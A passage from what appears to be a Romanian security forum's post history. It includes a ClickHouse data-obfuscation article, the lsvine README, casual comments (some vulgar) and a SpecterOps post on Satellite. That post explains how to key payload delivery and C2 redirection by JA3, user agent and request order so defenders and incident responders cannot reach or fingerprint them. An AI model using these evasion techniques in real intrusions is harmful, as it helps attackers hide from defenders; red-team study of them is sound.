that this is actually a pseudorandom permutation. A random permutation of a set of elements is a randomly picked bijective (one-to-one) transformation of the set, or a mapping where each and every derived element corresponds to exactly one original element (and vice versa). In other words, it is a way to randomly iterate through all the elements of a data set. And that is exactly the process shown in the picture: each pixel is filled in random order, without any repetition. If we were to just choose a random pixel at each step, it would take a long time to get to the last one. The game uses a very simple algorithm for pseudorandom permutation called linear feedback shift register (LFSR). Similar to pseudorandom number generators, random permutations, or rather their families, can be cryptographically strong when parametrized by a key. This is exactly what we need for data transformation. However, the details might be trickier. For example, cryptographically strong encryption of N bytes to N bytes with a pre-determined key and initialization vector seems like it would work for a pseudorandom permutation of a set of N-byte strings. Indeed, this is a one-to-one transformation and it appears to be random. But if we use the same transformation for all of our data, the result may be susceptible to cryptoanalysis because the same initialization vector and key value are used multiple times. This is similar to the Electronic Codebook mode of operation for a block cipher. What are the possible ways to get a pseudorandom permutation? We can take simple one-to-one transformations and build a complex function that looks random. Here are some of my favorite one-to-one transformations: Multiplication by an odd number (like a large prime number) in two's complement arithmetic. Xorshift: x ^= x >> N. CRC-N, where N is the number of bits in the argument. For example, three multiplications and two xorshift operations are used for the murmurhash finalizer. This operation is a pseudorandom permutation. However, I should point out that hash functions don't have to be one-to-one (even hashes of N bits to N bits). Or here's another interesting example from elementary number theory from Jeff Preshing's website. How can we use pseudorandom permutations to solve our problem? We can use them to transform all numeric fields so we can preserve the cardinalities and mutual cardinalities of all combinations of fields. In other words, COUNT(DISTINCT) will return the same value as before the transformation, and furthermore, with any GROUP BY. It is worth noting that preserving all cardinalities somewhat contradicts our goal of data anonymization. Let's say someone knows that the source data for site sessions contains a user who visited sites from 10 different countries, and they want to find that user in the transformed data. The transformed data also shows that the user visited sites from 10 different countries, which makes it easy to narrow down the search. Even if they find out what the user was transformed into, it won't be very useful, because all the other data has also been transformed, so they won't be able to figure out what sites the user visited or anything else. But these rules can be applied in a chain. For example, if someone knows that the most frequently occurring website in our data is Yandex, with Google in second place, they can just use ranking to determine which transformed site identifiers actually mean Yandex and Google. There's nothing surprising about this, since we are working with an informal problem statement and we are just trying to find a balance between anonymization of data (hiding information) and preserving data properties (disclosure of information). For information about how to approach the data anonymization issue more reliably, read this article. In addition to keeping the original cardinality of values, I also want to keep the order of magnitude of the values. What I mean is that if the source data contained numbers under 10, then I want the transformed numbers to also be small. How can we achieve this? For example, we can divide a set of possible values into size classes and perform permutations within each class separately (maintaining the size classes). The easiest way to do this is to take the nearest power of two or the position of the most significant bit in the number as the size class (these are the same thing). The numbers 0 and 1 will always remain as is. The numbers 2 and 3 will sometimes remain as is (with a probability of 1/2) and will sometimes be swapped (with a probability of 1/2). The set of numbers 1024..2047 will be mapped to one of 1024! (factorial) variants, and so on. For signed numbers, we will keep the sign. It's also doubtful whether we need a one-to-one function. We can probably just use a cryptographically strong hash function. The transformation won't be one-to-one, but the cardinality will be close to the same. However, we do need a cryptographically strong random permutation so that when we define a key and derive a permutation with that key, it would be difficult to restore the original data from the rearranged data without knowing the key. There is one problem: in addition to knowing nothing about neural networks and machine learning, I am also quite ignorant when it comes to cryptography. That leaves just my courage. I was still reading random web pages, and found a link on Hackers News to a discussion on Fabien Sanglard's page. It had a link to a blog post by Redis developer Salvatore Sanfilippo that talked about using a wonderful generic way of getting random permutations, known as a Feistel network. The Feistel network is iterative, consisting of rounds. Each round is a remarkable transformation that allows you to get a one-to-one function from any function. Let's look at how it works. 1.The argument's bits are divided into two halves: arg: xxxxyyyy arg_l: xxxx arg_r: yyyy 2.The right half replaces the left. In its place we put the result of XOR on the initial value of the left half and the result of the function applied to the initial value of the right half, like this: res: yyyyzzzz res_l = yyyy = arg_r res_r = zzzz = arg_l ^ F(arg_r) There is also a claim that if we use a cryptographically strong pseudorandom function for F and apply a Feistel round at least 4 times, we'll get a cryptographically strong pseudorandom permutation. This is like a miracle: we take a function that produces random garbage based on data, insert it into the Feistel network, and we now have a function that produces random garbage based on data, but yet is invertible! The Feistel network is at the heart of several data encryption algorithms. What we're going to do is something like encryption, only it's really bad. There are two reasons for this: We are encrypting individual values independently and in the same way, similar to the Electronic Codebook mode of operation. We are storing information about the order of magnitude (the nearest power of two) and the sign of the value, which means that some values do not change at all. This way we can obfuscate numeric fields while preserving the properties we need. For example, after using LZ4, the compression ratio should remain approximately the same, because the duplicate values in the source data will be repeated in the converted data, and at the same distances from each other. Markov models Text models are used for data compression, predictive input, speech recognition, and random string generation. A text model is a probability distribution of all possible strings. Let's say we have an imaginary probability distribution of the texts of all the books that humanity could ever write. To generate a string, we just take a random value with this distribution and return the resulting string (a random book that humanity could write). But how do we find out the probability distribution of all possible strings? First, this would require too much information. There are 256^10 possible strings that are 10 bytes in length, and it would take quite a lot of memory to explicitly write a table with the probability of each string. Second, we don't have enough statistics to accurately assess the distribution. This is why we use a probability distribution obtained from rough statistics as the text model. For example, we could calculate the probability of each letter occurring in the text, and then generate strings by selecting each next letter with the same probability. This primitive model works, but the strings are still very unnatural. To improve the model slightly, we could also make use of the conditional probability of the letter's occurrence if it is preceded by N specific letters. N is a pre-set constant. Let's say N = 5 and we are calculating the probability of the letter "e" occurring after the letters "compr". This text model is called an Order-N Markov model. P(cata | cat) = 0.8 P(catb | cat) = 0.05 P(catc | cat) = 0.1 ... Let's look at how Markov models work on the website of Hay Kranen. Unlike LSTM neural networks, the models only have enough memory for a small context of fixed-length N, so they generate funny, nonsensical texts. Markov models are also used in primitive methods for generating spam, and the generated texts can be easily distinguished from real ones by counting statistics that don't fit the model. There is one advantage: Markov models work much faster than neural networks, which is exactly what we need. Example for Title (our examples are in Turkish because of the data used): We can calculate statistics from the source data, create a Markov model, and generate new data with it. Note that the model needs smoothing to avoid disclosing information about rare combinations in the source data, but this is not a problem. I use a combination of models from 0 to N. If statistics are insufficient for the model of order N, the N−1 model is used instead. But we still want to preserve the cardinality of data. In other words, if the source data had 123456 unique URL values, the result should have approximately the same number of unique values. We can use a deterministically initialized random number generator to achieve this. The easiest way to do this is to use a hash function and apply it to the original value. In other words, we get a pseudorandom result that is explicitly determined by the original value. Another requirement is that the source data may have many different URLs that start with the same prefix but aren't identical. For example: https://www.yandex.ru/images/cats/?id=xxxxxx. We want the result to also have URLs that all start with the same prefix, but a different one. For example: http://ftp.google.kz/cgi-bin/index.phtml?item=xxxxxx. As a random number generator for generating the next character using a Markov model, we'll take a hash function from a moving window of 8 bytes at the specified position (instead of taking it from the entire string). https://www.yandex.ru/images/cats/?id=12345 ^^^^^^^^ distribution: [aaaa][b][cc][dddd][e][ff][ggggg][h]... hash("images/c") % total_count: ^ http://ftp.google.kz/cg... It turns out to be exactly what we need. Here's the example of page titles: PhotoFunia - Haber7 - Hava mükemment.net Oynamak içinde şaşıracak haber, Oyunu Oynanılmaz • apród.hu kínálatában - RT Arabic PhotoFunia - Kinobar.Net - apród: Ingyenes | Posti PhotoFunia - Peg Perfeo - Castika, Sıradışı Deniz Lokoning Your Code, sire Eminema.tv/ PhotoFunia - TUT.BY - Your Ayakkanın ve Son Dakika Spor, PhotoFunia - big film izle, Del Meireles offilim, Samsung DealeXtreme Değerler NEWSru.com.tv, Smotri.com Mobile yapmak Okey PhotoFunia 5 | Galaxy, gt, după ce anal bilgi yarak Ceza RE050A V-Stranç PhotoFunia :: Miami olacaksını yerel Haberler Oyun Young video PhotoFunia Monstelli'nin En İyi kisa.com.tr –Star Thunder Ekranı PhotoFunia Seks - Politika,Ekonomi,Spor GTA SANAYİ VE PhotoFunia Taker-Rating Star TV Resmi Söylenen Yatağa każdy dzież wierzchnie PhotoFunia TourIndex.Marketime oyunu Oyna Geldolları Mynet Spor,Magazin,Haberler yerel Haberleri ve Solvia, korkusuz Ev SahneTv PhotoFunia todo in the Gratis Perky Parti'nin yapıyı bu fotogram PhotoFunian Dünyasın takımız halles en kulları - TEZ Results After trying four methods, I got so tired of this problem that it was time to just choose something, make it into a usable tool, and announce the solution. I chose the solution that uses random permutations and Markov models parametrized by a key. It is implemented as the clickhouse-obfuscator program, which is very easy to use. The input is a table dump in any supported format (such as CSV or JSONEachRow), and the command line parameters specify the table structure (column names and types) and the secret key (any string, which you can forget immediately after use). The output is the same number of rows of obfuscated data. The program is installed with clickhouse-client, has no dependencies, and works on almost any flavor of Linux. You can apply it to any database dump, not just ClickHouse. For instance, you can generate test data from MySQL or PostgreSQL databases or create development databases that are similar to your production databases. clickhouse-obfuscator \ --seed "$(head -c16 /dev/urandom | base64)" \ --input-format TSV --output-format TSV \ --structure 'CounterID UInt32, URLDomain String, \ URL String, SearchPhrase String, Title String' \ < table.tsv > result.tsv clickhouse-obfuscator --help Of course, everything isn't so cut and dried, because data transformed by this program is almost completely reversible. The question is whether it is possible to perform the reverse transformation without knowing the key. If the transformation used a cryptographic algorithm, this operation would be as difficult as a brute-force search. Although the transformation uses some cryptographic primitives, they are not used in the correct way, and the data is susceptible to certain methods of analysis. To avoid problems, these issues are covered in the documentation for the program (access it using --help). In the end, we transformed the data set we need for functional and performance testing and the Yandex VP of data security approved publication. clickhouse-datasets.s3.yandex.net/hits/tsv/hits_v1.tsv.xz clickhouse-datasets.s3.yandex.net/visits/tsv/visits_v1.tsv.xz Non-Yandex developers use this data for real performance testing when optimizing algorithms inside ClickHouse. Third-party users can provide us with their obfuscated data so that we can make ClickHouse even faster for them. We also released independent open benchmark for hardware and cloud providers on top of this data: clickhouse.yandex/benchmark_hardware.html Source: https://habr.com/en/company/yandex/blog/485096/
  7. Motivation I built lsvine to be like tree but with the first-level directories distributed horizontally (and dangling downwards, hence like a vine). This format compacts the information vertically and displays it in a trello-like format, one "card" per directory. Screenshots: Installation With cargo: cargo install lsvine Downloadable binary for 64-bit linux: LSVINE_VERSION=0.3.1 wget https://github.com/autofitcloud/lsvine/releases/download/$LSVINE_VERSION/lsvine-v$LSVINE_VERSION-x86_64-unknown-linux-musl.tar.gz tar -xzf lsvine-v$LSVINE_VERSION-x86_64-unknown-linux-musl.tar.gz mv lsvine ~/.local/bin/ Usage Regular usage: # lsvine --version lsvine 0.3.1 # lsvine . +---------------+------------------------------------------------+-------------+---------+---------------------------+---------+ | . | dist | screenshots | src | target | testdir | +---------------+------------------------------------------------+-------------+---------+---------------------------+---------+ | CHANGELOG | lsvine-v0.2.1-x86_64-unknown-linux-musl.tar.gz | ls.png | main.rs | release | test1 | | Cargo.lock | | lsvine.png | | x86_64-unknown-linux-musl | test2 | | Cargo.toml | | tree.png | | | test3 | | DEVELOPER.md | | | | | | | LICENSE | | | | | | | README.md | | | | | | | build.sh | | | | | | | mk_testdir.sh | | | | | | +---------------+------------------------------------------------+-------------+---------+---------------------------+---------+ Show hidden filenames # lsvine -a +----------------+----------------+------------------------------------------------+-----------------------+-------------------------------+---------------------------+----------+-------------------------------+ | . | .git | dist | screenshots | src | target | testdir | tests | +----------------+----------------+------------------------------------------------+-----------------------+-------------------------------+---------------------------+----------+-------------------------------+ | .README.md.swp | COMMIT_EDITMSG | .gitkeep | sideBySide-latest.png | level1dir.rs | .gitkeep | .gitkeep | test_tablebuf.rs | | .gitignore | FETCH_HEAD | lsvine-v0.3.1-x86_64-unknown-linux-musl.tar.gz | | longest_common_prefix.rs | .rustc_info.json | test1 | vecpath2vecl1dir_iterators.rs | | CHANGELOG | HEAD | | | main.rs | package | test2 | vecpath2vecl1dir_onefunc.rs | | Cargo.lock | ORIG_HEAD | | | main_bkp_onefunc.rs | release | test3 | | | Cargo.toml | branches | | | tablebuf.rs | x86_64-unknown-linux-musl | | | | DEVELOPER.md | config | | | vecpath2vecl1dir_iterators.rs | | | | | LICENSE | description | | | vecpath2vecl1dir_onefunc.rs | | | | | README.md | hooks | | | | | | | | build.sh | index | | | | | | | | mk_testdir.sh | info | | | | | | | | | logs | | | | | | | | | objects | | | | | | | | | refs | | | | | | | +----------------+----------------+------------------------------------------------+-----------------------+-------------------------------+---------------------------+----------+-------------------------------+ Contract filename suffixes to reduce occupied screen-space further: # lsvine testdir/test1 +----+----+----+-----+ | . | d1 | d2 | d3 | +----+----+----+-----+ | f1 | f4 | f7 | d4 | | f2 | f5 | f8 | f10 | | f3 | f6 | f9 | f11 | | | | | f12 | | | | | f13 | | | | | f14 | +----+----+----+-----+ # lsvine testdir/test1 --contract-suffix +--------+--------+--------+---------+ | . | d1 | d2 | d3 | +--------+--------+--------+---------+ | f* (3) | f* (3) | f* (3) | d4 | | | | | f1* (5) | +--------+--------+--------+---------+ # lsvine testdir/test1 --contract-suffix --minimum-prefix-length=2 +----+----+----+---------+ | . | d1 | d2 | d3 | +----+----+----+---------+ | f1 | f4 | f7 | d4 | | f2 | f5 | f8 | f1* (5) | | f3 | f6 | f9 | | +----+----+----+---------+ For example, lsvine -c -m 3 /etc output here The future At some point, might want to get merged into other popular rust-based modern ls alternatives. It could be implemented as a separate option, eg exa --vine or lsd --vine. Example repos exa (pro) It already has a long grid view (con) Author seems too busy to dequeue issues and PRs (con) README doesn't list download binary from releases and run website https://the.exa.website/ lists download binary lsd (pro) Distributed via snap in addition to other channels that exa uses (con) Requires some fonts as pre-requisite Others at github topic = ls License Apache License 2.0. Check file LICENSE Dev notes Check DEVELOPER.md Author Built by AutofitCloud. Source: https://github.com/autofitcloud/lsvine
  8. Satellite is an alternative to Apache and Nginx for payload hosting as well as an alternative to Caddy for C2 traffic redirection. I focused on making the project feature rich, easy-to-use, and reliable. The source and compiled binaries can be found on GitHub. During my internship at SpecterOps this past summer, I had the opportunity to sit next to Lee Christensen who gave the idea to pursue this project. He thought it would be a cool idea if an operator could key their payload downloads based on JA3 signatures. I mocked up a basic web server that would only serve requests only if it matched a predefined JA3 signature using CapacitorSet’s ja3-server package as a model. (For those not familiar with JA3, check out the writeup I contributed to Impersonating JA3 Fingerprints). Once I had the skeleton for payload delivery and HTTP proxying, I took on the task of creating a drop-in replacement for Apache mod_rewrite and Nginx. Satellite now has the ability to filter traffic based on the number of times a payload has been served, the User Agent, JA3 signatures, prerequisite paths (which I’ll show off later) and more. Satellite is not intended to provide the flexibility of mod_rewrite, but instead enable easy payload delivery keying with features almost impossible to replicate in mod_rewrite. Feature Highlights JA3 Payload Delivery Keying Request Order Payload Delivery Keying Configurable Payload Lifetime C2 Traffic Redirection (Proxying) Scriptable Request Keying Easy Credential Capture Global Request Filtering How to Install As previously mentioned, a large focus of the project was to make traffic keying easy to set up. This extends from usage to installation. The easiest installation method is to use the Debian software package format (.deb) on a Debian based system, which only requires downloading the file and using dpkg to install it. You can use the Installation wiki page to learn how to install Satellite on non-Debian systems. Route Configuration In Satellite, a route is the page requested by the user. The content of a route can be configured in the same way one configures a route in Apache or Nginx: put a file in the server root. By default, Satellite uses /var/www/html as the directory to serve files from, but that can be changed in the server config. Once Satellite is installed and running, you can begin serving pages. The “.info” file is where the magic of Satellite happens. The “.info” file is a YAML file that specifies what special actions should happen when a file is requested. These actions can either be keying options to protect a payload from unwanted requests (a member from the blue team) or directives like on_failure which specifies what should happen to the request if the key does not match. In addition to serving files, operators can also use the same keying options for traffic redirection using the proxy option. There is a special file in the server_root called proxy.yml which allows users to make a list of routes they’d like to proxy without having to create a dummy file. The proxy file works the same as a normal “.info” file, so the keying options that work on a payload also work with proxying. See the proxy example on GitHub for an in-depth explanation. I’ll go over a few keying options to solidify the point. First, the serve option allows operators to specify how many times they’d like for a file to be served before it’s inaccessible. This is a useful option when a payload only has one target. When the target downloads the file, the payload is no longer accessible through the web server. Next, is blacklist_useragents. As the name implies, one can blacklist User Agents from accessing a payload. The field matches a regular expression, so an operator can estimate blocking Linux clients by using: blacklist_useragents: - *Linux* Next, and maybe the most important, is on_failure. This option specifies what happens when a request fails to match a key. I’ll go more in-depth about on_failure in the Server Configuration section. Prereq Directive Next, the prereq directive is a really simple way to force requesters to access a set of paths before accessing another. This is useful when an operator uses ClickOnce for initial access. The ClickOnce application will first request the path /<name>/tracker.jpg before accessing ClickOnce.application. Using the prereq directive, an operator is able to deny access to CickOnce.application if they have not requested /<name>/tracker.jpg. For a simple example, if an operator knows their payload will request /a.jpeg and /metadata.json before it finally requests /payload, the operator can use the contents of the following file, payload.info, to only serve /payload once /a.jpeg and /metadata.json have been requested: prereq: - /a.jpeg - /metadata.json The example in the wiki shows how an operator can stack prereqs to force users to request one path after another. There are many ways this could be implemented, so understanding how it works is important. First, Satellite tracks users based on IP addresses since cookies may not be obeyed by the client. This means that if requesters with the same external IP are requesting pages, Satellite could fail to serve the payload even if one user requested each page in order. Second, the requests are also matched consecutively limited by the number of paths in the prereq list. This means that if the prereq directive states “access /one then access /two before accessing /payload”, but the user requests “/three, /one, /two, /payload,” Satellite will serve the payload. Using the same example, Satellite will not serve the request “/two, /one, /payload.” Testing this technique doesn’t work very well on browsers (especially Chrome) because requests are typically performed multiple times for preemptive rendering and caching reasons. authorized_ja3 Last, authorized_ja3 only allows specific JA3 signatures to access the payload. In my opinion, this is less useful for payload hosting unless you do intelligence gathering beforehand, but is extremely powerful for redirector proxying. JA3 signatures could stay the same between C2 agents unless it uses the operating system’s HTTP library for making calls and therefore presents varying JA3 signatures. In the case of static C2 agent JA3 signatures, you can key a Satellite route to only communicate with requestors that match a predefined C2 agent’s JA3 signature. This technique is useful to hide characteristics of a backend C2 server and the true purpose of a configured proxy route. For example, during an ongoing IR investigation, an incident responder could pull their proxy\netflow data from your C2 channel and mimic a request to the redirector’s configured route. However, unless they can also identify and replicate arbitrary JA3 signatures (ja3transport), they will not be able to directly interact with the backend C2 server — hiding the true nature of a route and preventing C2 server fingerprinting. Global Conditions If an operator has a list of keys they know they want to use for every operation, global conditions can be applied. In the /etc/satellite/conditions/ directory, files will be combined and applied to all Satellite requests. An example and deeper explanation can be found on the wiki. There are many more options to check out like authorized_countries, prereq, and blacklist_iprange which are listed on the Route Configuration wiki page. Server Configuration Out of the box, there is no required configuration in order to start serving pages. Satellite looks in three places to find server configuration: $HOME/.config/satellite/config.yml, $HOME/.satellite/config.yml, and /etc/satellite/config.yml. Once a valid configuration file is found, it validates the configuration settings and starts the server. Satellite’s server configuration options will be familiar if you’ve used other web servers like Apache or Nginx. For example, the default index, the listening port, and the server header are configurable. I’ll mention two things which are a bit different than normal web servers. The not_found option has either the subkey of redirect or render. The redirect option will perform a “301 redirect” to a specified site while the render option will perform a “200 OK” render of the page specified. The not_found option is also the default catch-all when a route does not match a request but does not specify a not_found option itself. Example Here is a video of how to use Satellite to key a payload. Source: https://posts.specterops.io/satellite-a-payload-and-proxy-service-for-red-team-operations-aa4500d3d970
  9. Omul vrea javababy sa spioneze lumea si nu stie cum, il mananca fundul de la urzici si morcovi
  10. Pai da pai nu, incearca cu live, faci bac-up, iar dupe te poti juca cat vrei PS: aici https://www.thecyberhelpline.com/guides/screenlocking-ransomware
  11. Nu i se intampla stai tu linistit, omul ti-a spus realitatea. incercati cu un live, tind sa cred ca este doar un screen lock
  12. Ei nu, baga o vizita prin Ferentari, cu telefoanele pă tine, "ai un foc,? "
  13. Am postat ceva similar, nu am descarcat sample-ul sa ii fac analiza
  14. Sa te mai vad ca ceri conturi de filelist, acum cat e cald, tot tu faci pizda mare
  15. Ìl vinzi si intri in rețea cu "băjeții" Sigur e ciordit, garanție, certificat de import, ceva? Edit:/ sunt reduceri aici pe emag, altex, amazon, etc..
  16. "Now users can open a social network only by invitation or by making a donation to support the project: $ 12.99 per month or $ 100 per year." Poti intra si cu invitatie
  17. Cofondatorul Wikipedia, Jimmy Wales, a lansat o noua retea de socializare online care spera sa rivalizeze cu Facebook si Twitter pentru a combate "vanatoarea de click-uri" si "titlurile inselatoare", relateaza Financial Times. WT:Social, site-ul noii sale retele sociale, permite utilizatorilor sa distribuie link-uri cu articole de presa care apoi sa fie dezbatute pe modelul news feed-ului de la Facebook. Subiectele variaza de la politica si tehnologie la heavy metal si apicultura. Desi compania nu are nicio legatura cu Wikipedia, Wales a imprumutat modelul de business al enciclopediei online. WT:Social se va baza pe donatii de la o mica subcategorie de utilizatori pentru a permite retelei sa functioneze fara reclame pe care acesta le blameaza pentru ca incurajeaza un tip gresit de implicare pe retelele sociale. "Modelul de busimess al companiilor din social media, de publicitate pura, este problematic", a declarat Wales. "Se pare ca marele castigator este un continut de calitate scazuta", a adaugat acesta. In timp ce algoritmii Facebook si Twitter asigura ca postarile cu cele mai multe comentarii sau aprecieri apar primele, in timp ce WT:Social afiseaza mai intai link-urile noi. Cu toate acestea, WT:Social spera sa adauge un buton cu "sageata in sus" care sa permita utilizatorilor sa recomande postarile de calitate. De la lansarea sa de luna trecuta, WT:Social se apropie de 50.000 de utilizatori, potrivit lui Wales, numarul lor dublandu-se in ultima saptamana. Totusi, asta este departe de audienta Facebook de peste 2 miliarde. "Evident, ambitia nu este de 50.000 sau 500.000, ci 50 de milioane si 500 de milioane", a spus Wales. Peste 200 de persoane au donat pentru a sprijini site-ul, a spus el, aratand succesul abonamentelor la Netflix, Spotify si New York Times ca dovada ca o noua generatie de consumatori sunt pregatiti sa plateasca pentru continutul online "relevant". Via: http://www.ziare.com/facebook/utilizatori/cofondatorul-wikipedia-lanseaza-o-retea-de-socializare-sa-rivalizeze-cu-facebook-si-twitter-1585839
  18. Cateva detalii pe unde se misca viermele https://www.hybrid-analysis.com/sample/c82ce2582797636c33ba2d86a2ff3b097e65c4eb143f5d2ee79cf62768d77244/5dc238050388383c01e46545
  19. Bun venit, erai cumva cu pseudonimul de Sekt0r, acum ceva ani?
  20. AIFAM :))) Vezi aici https://www.digitalcameraworld.com/buying-guides/best-dash-cam
  21. Am răspuns la ce a scria @Wav3 mi-am prăjit telefonul
  22. Crezi ca sunt idiot? Am intrebat ceva, revin cu replay
  23. @Wav3 el e cu reduceri
  24. Parfum, doar ca se mai intrerupe conexiunea, mulțumesc, imi i-au versiunea pro
×
×
  • Create New...